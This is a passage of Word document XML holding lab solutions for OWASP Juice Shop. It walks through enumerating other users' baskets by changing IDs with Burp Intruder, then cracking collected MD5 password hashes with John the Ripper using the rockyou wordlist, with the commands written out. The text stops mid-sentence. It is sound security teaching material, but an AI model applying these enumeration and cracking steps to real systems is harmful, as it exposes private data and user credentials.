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7654F" w14:textId="5EEAFB79" w:rsidR="008833D2" w:rsidRDefault="00EB7F89">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session 3 Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE2F5D" w14:textId="58B2F199" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89">
      <w:r>
        <w:t xml:space="preserve">1) The first step is to log </w:t>
      </w:r>
      <w:r w:rsidR="004C0579">
        <w:t>in and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capture that crucial request! Log in as any user, turn intercept on in Burp (see the GIAG worksheet solutions for detailed instructions on how to do this) and click ‘Your Basket’ in the top-right of Juice Shop. You should see a request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/rest/basket/x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, where the number at the end is the ID of </w:t>
      </w:r>
      <w:r w:rsidR="0032748F">
        <w:t>whichever</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user you are logged in as. Now, let’s see what happens if we change that number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587EE9F3" w14:textId="380E9A12" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89">
      <w:r>
        <w:t>If we send the request to the Repeater, we can edit the number and resend to see if it gives us another user’s basket. Using the Repeater is always a good step before an attack, to figure out which parts of the request we should use as our payload! Indeed, changing the number gives us back a different basket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F8C79" w14:textId="77777777" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89" w:rsidP="00EB7F89">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="217426C0" wp14:editId="778BF288">
            <wp:extent cx="5731510" cy="21691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169160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D68C19" w14:textId="63660BFC" w:rsidR="00EB7F89" w:rsidRPr="00EB7F89" w:rsidRDefault="00EB7F89" w:rsidP="00EB7F89">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Resending the request in the Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D671DD2" w14:textId="6BB4897A" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89">
      <w:r>
        <w:t xml:space="preserve">Now it’s time to configure our attack in the Intruder. Go back to </w:t>
      </w:r>
      <w:r w:rsidR="0026680D">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP history</w:t>
      </w:r>
      <w:r w:rsidR="0026680D">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the Proxy tab, and right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/rest/basket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r w:rsidR="00AB6A60">
        <w:t xml:space="preserve"> to send it to Intruder. Now we have a few opt</w:t>
      </w:r>
      <w:r w:rsidR="006D7DC9">
        <w:t>ions to configure; the Intruder will automatically set the target to be the same as the original request</w:t>
      </w:r>
      <w:r w:rsidR="00C944F3">
        <w:t>, so there’s nothing to change here</w:t>
      </w:r>
      <w:r w:rsidR="00DD1F9D">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00C944F3">
        <w:t xml:space="preserve">instead, click the ‘Positions’ tab to tell the Intruder what to modify in the request. This screen allows you to mark specific parts of the request, and the Intruder will then ‘inject’ different values and resend the request. We want to </w:t>
      </w:r>
      <w:r w:rsidR="002F5105">
        <w:t xml:space="preserve">change the number at the end of the request, so let’s press the </w:t>
      </w:r>
      <w:r w:rsidR="002C406C">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="002F5105">
        <w:t xml:space="preserve">Clear </w:t>
      </w:r>
      <w:r w:rsidR="002C406C">
        <w:t>§’ button to get rid of the pre-generated Positions. Then highlight the number and press ‘Add §’ to add a new position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44371F2A" w14:textId="77777777" w:rsidR="0066105C" w:rsidRDefault="0066105C" w:rsidP="0066105C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC811AD" wp14:editId="1B8A0E59">
            <wp:extent cx="6427117"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53719" cy="1549437"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65909F6D" w14:textId="64CE9162" w:rsidR="0066105C" w:rsidRDefault="0066105C" w:rsidP="0066105C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Adding a position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B3183" w14:textId="5FC17848" w:rsidR="00170457" w:rsidRDefault="00170457" w:rsidP="00170457">
      <w:r>
        <w:t>Leave the attack type as ‘Sniper’ and click the ‘Payloads’ tab.</w:t>
      </w:r>
      <w:r w:rsidR="00375E8D">
        <w:t xml:space="preserve"> Now we can tell Burp what kind of data it should inject into our position. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00025AE7">
        <w:t>We’ve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00025AE7">
        <w:t xml:space="preserve"> only chosen one </w:t>
      </w:r>
      <w:r w:rsidR="00375E8D">
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidR="00025AE7">
        <w:t xml:space="preserve"> so</w:t>
      </w:r>
      <w:r w:rsidR="00375E8D">
        <w:t xml:space="preserve"> this step is fairly simple, but as you can see there are lots of options for custom payloads should you wish to do something more </w:t>
      </w:r>
      <w:r w:rsidR="00375E8D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">complex! </w:t>
      </w:r>
      <w:r w:rsidR="00E12AB6">
        <w:t>We will want to set our ‘Payload type’ to ‘Numbers’</w:t>
      </w:r>
      <w:r w:rsidR="002458CB">
        <w:t xml:space="preserve">, and then specify a sequence of numbers to iterate over. We can also define the </w:t>
      </w:r>
      <w:r w:rsidR="00B00DB9">
        <w:t>‘Step’</w:t>
      </w:r>
      <w:r w:rsidR="002458CB">
        <w:t>, which is the amount the payload increments by with each request – as we want to check all baskets within the range we provide, let’s leave it a</w:t>
      </w:r>
      <w:r w:rsidR="000D12E3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002458CB">
        <w:t xml:space="preserve"> 1.</w:t>
      </w:r>
      <w:r w:rsidR="00FA3EA3">
        <w:t xml:space="preserve"> We’ll check baskets 1 to 10, but you can modify this based on how many users are on your instance of Juice Shop.</w:t>
      </w:r>
      <w:r w:rsidR="002458CB">
        <w:t xml:space="preserve"> Now our attack payload should look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B47E14" w14:textId="77777777" w:rsidR="00B9548B" w:rsidRDefault="002458CB" w:rsidP="00B9548B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7196ABAC" wp14:editId="0CBEBD79">
            <wp:extent cx="5731510" cy="2211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11705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21169276" w14:textId="6210F861" w:rsidR="002458CB" w:rsidRDefault="00B9548B" w:rsidP="00B9548B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Setting our payload options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D48F05E" w14:textId="170AF075" w:rsidR="002458CB" w:rsidRPr="00170457" w:rsidRDefault="002458CB" w:rsidP="00170457">
      <w:r>
        <w:t>Press ‘Start attack’ and see what happens!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC5017" w14:textId="77777777" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89" w:rsidP="00EB7F89">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB447FD" wp14:editId="46F7F8E1">
            <wp:extent cx="5731510" cy="4097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97020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24FF49" w14:textId="6BBC8D88" w:rsidR="00EB7F89" w:rsidRDefault="00EB7F89" w:rsidP="00EB7F89">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Running the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23101171" w14:textId="4FFFFC06" w:rsidR="00950BE7" w:rsidRDefault="00950BE7" w:rsidP="00950BE7">
      <w:r>
        <w:t>The results page allows us to see the response from each request, which contains the details of the user’s basket in JSON format!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74444E" w14:textId="53C69497" w:rsidR="00950BE7" w:rsidRDefault="00950BE7" w:rsidP="00FE5864">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">If you’re interested in reading more about the function of the Intruder, see </w:t>
      </w:r>
      <w:r w:rsidR="004829CE">
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00474858">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FE5864">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F4AD6" w14:textId="0B26AF63" w:rsidR="00FE5864" w:rsidRDefault="00FE5864" w:rsidP="00FE5864">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7680"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662332EB" w14:textId="5E901C80" w:rsidR="00FE5864" w:rsidRDefault="00FE5864" w:rsidP="00FE5864">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00AE5F17">
        <w:t xml:space="preserve">John the Ripper should be preinstalled on Kali Linux and added to your PATH (the list of locations where the command line should look for programs). </w:t>
      </w:r>
      <w:r w:rsidR="00852AE3">
        <w:t>If you’re not sure, you</w:t>
      </w:r>
      <w:r w:rsidR="00AE5F17">
        <w:t xml:space="preserve"> can check this using the which john or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE5F17">
        <w:t>whereis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE5F17">
        <w:t xml:space="preserve"> john commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496F75C" w14:textId="77777777" w:rsidR="00846BD5" w:rsidRDefault="006B3E54" w:rsidP="00846BD5">
      <w:pPr>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7680"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54BF12FB" wp14:editId="40E099B2">
            <wp:extent cx="4543425" cy="104774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55" r="1433" b="64234"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4543425" cy="1047746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37453869" w14:textId="2823FBF1" w:rsidR="00AE5F17" w:rsidRDefault="00846BD5" w:rsidP="00846BD5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Checking john is installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C25E6F" w14:textId="503E3950" w:rsidR="00B55C17" w:rsidRDefault="00A678B6" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Now we need to make a list of password hashes – create a directory for </w:t>
      </w:r>
      <w:r w:rsidR="00256CE1">
        <w:t xml:space="preserve">Juice Shop using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00256CE1">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00256CE1">
        <w:t xml:space="preserve"> juice-shop and then create a file with nano passwords. Then paste in any password hashes you’ve found so far (remember, you can get these from the tokens of logged-in users)</w:t>
      </w:r>
      <w:r w:rsidR="00896837">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E26E4F">
        <w:t xml:space="preserve"> Here, we’ve taken the passwords of the first </w:t>
      </w:r>
      <w:r w:rsidR="00C94F7F">
        <w:t>six</w:t>
      </w:r>
      <w:r w:rsidR="00E26E4F">
        <w:t xml:space="preserve"> users in the database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7679F" w14:textId="77777777" w:rsidR="00AD7DD2" w:rsidRDefault="00E26E4F" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6CE02C" wp14:editId="71E0DBB6">
            <wp:extent cx="4171950" cy="172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1950" cy="1724025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DD581" w14:textId="67051DE4" w:rsidR="00E26E4F" w:rsidRDefault="00AD7DD2" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Making a list of hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780D08D" w14:textId="592A9C80" w:rsidR="003870C4" w:rsidRDefault="003870C4" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Then we need to run </w:t>
      </w:r>
      <w:r w:rsidR="00C540A6">
        <w:t>John itself! John has a few modes</w:t>
      </w:r>
      <w:r w:rsidR="00581559">
        <w:t xml:space="preserve">; ‘Single Crack’ mode commonly targets one password and uses a mix of information such as usernames and domain names for a specific user, plus </w:t>
      </w:r>
      <w:r w:rsidR="00F664D0">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00581559">
        <w:t>mangling</w:t>
      </w:r>
      <w:r w:rsidR="00F664D0">
        <w:t xml:space="preserve">’ rules, to generate a targeted wordlist – it is fast, but not what we’ll be using here; </w:t>
      </w:r>
      <w:r w:rsidR="00786C10">
        <w:t>‘Wordlist’ mode takes a specific wordlist and iterates over it</w:t>
      </w:r>
      <w:r w:rsidR="005C5EDF">
        <w:t>, applying mangling rules if you ask it to – nice and simple password cracking, and the mode you’ll use the most; ‘Incremental’ mode is true brute force, and generates all possible character combinations until it finds a match</w:t>
      </w:r>
      <w:r w:rsidR="006D7B67">
        <w:t xml:space="preserve"> – with infinite time you’ll crack the password, but often it’s sufficient to use a wordlist</w:t>
      </w:r>
      <w:r w:rsidR="00C540A6">
        <w:t xml:space="preserve">. See more </w:t>
      </w:r>
      <w:r w:rsidR="006D7B67">
        <w:t xml:space="preserve">about </w:t>
      </w:r>
      <w:r w:rsidR="00865A34">
        <w:t>these modes</w:t>
      </w:r>
      <w:r w:rsidR="006D7B67">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F24D15">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00C540A6">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00F24D15">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C540A6">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="006D7B67">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFD943" w14:textId="5F37D145" w:rsidR="006D7B67" w:rsidRDefault="006D7B67" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">By default, </w:t>
      </w:r>
      <w:r w:rsidR="007213E8">
        <w:t>John uses ‘Wordlist’ mode with a default list, and then switches to incremental mode</w:t>
      </w:r>
      <w:r w:rsidR="007E52FC">
        <w:t xml:space="preserve"> if it can’t find a match. You can </w:t>
      </w:r>
      <w:r w:rsidR="00155B42">
        <w:t xml:space="preserve">execute this by simply typing </w:t>
      </w:r>
      <w:r w:rsidR="00155B42" w:rsidRPr="000E77FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>john passwords</w:t>
      </w:r>
      <w:r w:rsidR="004D453E">
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:r w:rsidR="00296059">
        <w:t xml:space="preserve">our hashes </w:t>
      </w:r>
      <w:r w:rsidR="004D453E">
        <w:t>happen to match against several different hash formats</w:t>
      </w:r>
      <w:r w:rsidR="001E5533">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="007150A9">
        <w:t xml:space="preserve"> John</w:t>
      </w:r>
      <w:r w:rsidR="001E5533">
        <w:t xml:space="preserve"> picks the wrong one by default! From experience we can tell you these hashes are MD5, so let’s specify that hash format in our command by typing </w:t>
      </w:r>
      <w:r w:rsidR="001E5533" w:rsidRPr="000E77FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john passwords </w:t>
      </w:r>
      <w:r w:rsidR="00763BA8" w:rsidRPr="000E77FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="001E5533" w:rsidRPr="000E77FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format=Raw-MD5</w:t>
      </w:r>
      <w:r w:rsidR="001E5533">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D763F" w14:textId="77777777" w:rsidR="00AD7DD2" w:rsidRDefault="00296474" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F60B045" wp14:editId="41425A61">
            <wp:extent cx="5731510" cy="15176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517650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE6CC4" w14:textId="78417A0F" w:rsidR="00296474" w:rsidRDefault="00AD7DD2" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Basic MD5 crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57EE4E" w14:textId="1E493EAC" w:rsidR="00B10631" w:rsidRDefault="00B10631" w:rsidP="00950BE7">
      <w:r>
        <w:t>This takes a while, but eventually finds all our passwords</w:t>
      </w:r>
      <w:r w:rsidR="008166AC">
        <w:t xml:space="preserve"> if we let it finish</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">! We can also specify a wordlist of our own </w:t>
      </w:r>
      <w:r w:rsidR="007A55EF">
        <w:t xml:space="preserve">using the </w:t>
      </w:r>
      <w:r w:rsidR="007A55EF" w:rsidRPr="006C5B22">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-wordlist</w:t>
      </w:r>
      <w:r w:rsidR="007A55EF">
        <w:t xml:space="preserve"> flag. A good one is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A55EF">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A7C7E">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="006C5B22">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008A7C7E">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="007A55EF">
        <w:t xml:space="preserve">, which ships with Kali </w:t>
      </w:r>
      <w:r w:rsidR="00C65F67">
        <w:t>and can be found under</w:t>
      </w:r>
      <w:r w:rsidR="00691AC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00691AC2" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AC2" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AC2" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="00363C8B">
        <w:t xml:space="preserve">. To use John with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00363C8B">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00363C8B">
        <w:t xml:space="preserve">, type </w:t>
      </w:r>
      <w:r w:rsidR="00363C8B" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>john passwords</w:t>
      </w:r>
      <w:r w:rsidR="00984C11" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763BA8" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00984C11" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format=Raw-MD5 -wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00984C11" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00984C11" w:rsidRPr="00764CA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A077097" w14:textId="77777777" w:rsidR="00AD7DD2" w:rsidRDefault="001F172F" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BE9797" wp14:editId="45AB34E3">
            <wp:extent cx="5731510" cy="7448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44855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D15B7D" w14:textId="3F383A5E" w:rsidR="001F172F" w:rsidRDefault="00AD7DD2" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Cracking with a wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3681AB" w14:textId="62815B24" w:rsidR="00D20D4E" w:rsidRDefault="00D20D4E" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Cracking may take some time, but when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you’re</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> done you can see the results with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C95C0C">
        <w:rPr>
